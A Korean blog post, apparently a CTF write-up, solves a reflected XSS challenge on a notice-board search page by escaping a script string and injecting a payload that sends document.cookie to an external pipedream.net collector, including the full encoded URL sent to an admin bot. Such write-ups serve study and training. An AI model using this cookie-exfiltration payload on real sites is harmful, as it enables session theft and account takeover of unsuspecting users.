[CTF] XSS2

CHIKAยท2024๋…„ 6์›” 28์ผ
post-thumbnail

๐Ÿ“Œ
XSS (Cross Site Scripting)
Cookie ํƒˆ์ทจ


์ทจ์•ฝ์  ์„ค๋ช… : Reflected XSS
์ทจ์•ฝ์  ๋ฐœ์ƒ ์œ„์น˜ : notice_list.php


ํšŒ์›๊ฐ€์ž…-๋กœ๊ทธ์ธ-๊ฒŒ์‹œํŒ ๊ฒ€์ƒ‰


์ž…๋ ฅํ•œ ๊ฐ’์ด ๊ทธ๋Œ€๋กœ ๋œฌ๋‹ค. Reflected XSS์˜ ๊ฐ€๋Šฅ์„ฑ!
ํŠน์ˆ˜๋ฌธ์ž ๋จผ์ € ๋„ฃ์–ด๋ณธ๋‹ค.


HTML Entity๋กœ ๋ฐ”๋€๋‹ค.

๊บฝ์‡ ๋Š” ์“ธ ์ˆ˜ ์—†์œผ๋‹ˆ ์ฃผ์–ด์ง„ ์Šคํฌ๋ฆฝํŠธ๋ฅผ ํƒˆ์ถœํ•˜์ง€ ์•Š๊ณ  alert(1) ๋จผ์ € ์ถœ๋ ฅํ•ด๋ณด์ž.

<script>alert('"์ž…๋ ฅ๊ฐ’"์— ๋Œ€ํ•œ ๊ฒ€์ƒ‰ ๊ฒฐ๊ณผ๊ฐ€ ์กด์žฌํ•˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค.')<script>

๋ผ๊ณ  ๋˜์–ด ์žˆ์œผ๋‹ˆ ๊ตฌ๋ฌธ์„ ๋งž์ถฐ์ฃผ๊ธฐ ์œ„ํ•ด ')์„ ๋„ฃ๊ณ  ๋’ค๋Š” ์ฃผ์„์ฒ˜๋ฆฌ ํ•ด์ฃผ์—ˆ๋‹ค.


์˜๋„ํ•œ๋Œ€๋กœ ์Šคํฌ๋ฆฝํŠธ๊ฐ€ ์‹คํ–‰๋˜๋Š” ๊ฒƒ์„ ํ™•์ธ.

Reflected XSS๋‹ˆ๊นŒ GET ๋ฐฉ์‹์œผ๋กœ๋„ ์ž‘๋™ํ•˜๋Š”์ง€ ๊ผญ!!! ์ฒดํฌํ•ด์•ผํ•œ๋‹ค.
๋งํฌ๊ณต๊ฒฉ์ด๊ธฐ ๋•Œ๋ฌธ์— URL๋กœ ๋งŒ๋“ค์–ด ๋ณด๋‚ด ํ•ด๋‹น URL๋กœ ์ ‘์†ํ•˜๋ฉด ์‹คํ–‰๋˜์–ด์•ผํ•œ๋‹ค. Burp์—์„œ change request method ํ•ด์ค€๋‹ค.

GET๋ฐฉ์‹์œผ๋กœ ๋ณด๋ƒˆ์„๋•Œ alert('1')์ด ์ž‘๋™ํ•˜๋Š” ๊ฒƒ์„ ํ™•์ธ.

๋’ค์—๋‹ค๊ฐ€ ์ฟ ํ‚คํƒˆ์ทจ ์ฝ”๋“œ๋ฅผ ์‚ฝ์ž…ํ•œ๋‹ค. ๊ฒ€์ƒ‰์ฐฝ์—

1'); var cookieData =document.cookie;var i =new Image(); i.src = "https://en2hyoic3j7mi.x.pipedream.net/?cookie=" + cookieData; //

๋ฅผ ์ž…๋ ฅํ•˜๋ฉด ๋œ๋‹ค.

๊ณต๊ฒฉ์ž ์„œ๋ฒ„๋กœ ์ฟ ํ‚ค๊ฐ’์ด ๋„˜์–ด์˜ค๋Š”์ง€ ํ™•์ธํ•ด๋ณด์ž.


์ฟ ํ‚ค๊ฐ’์ด ์ž˜ ๋„˜์–ด์˜ค๊ณ  ์žˆ๋‹ค!

๊ด€๋ฆฌ์ž ๋ด‡์— ํ•ด๋‹น URL์„ ๋ณด๋‚ด์ž.

http://ctf.segfaulthub.com:4343/xss_2/notice_list.php?option_val=username&board_result=1%27%29%3B+var+cookieData+%3Ddocument.cookie%3Bvar+i+%3Dnew+Image%28%29%3B+i.src+%3D+%22https%3A%2F%2Fen2hyoic3j7mi.x.pipedream.net%2F%3Fcookie%3D%22+%2B+cookieData%3B+%2F%2F&board_search=%F0%9F%94%8D&date_from=&date_to=

์ฟ ํ‚คํƒˆ์ทจ ์„ฑ๊ณต!

0๊ฐœ์˜ ๋Œ“๊ธ€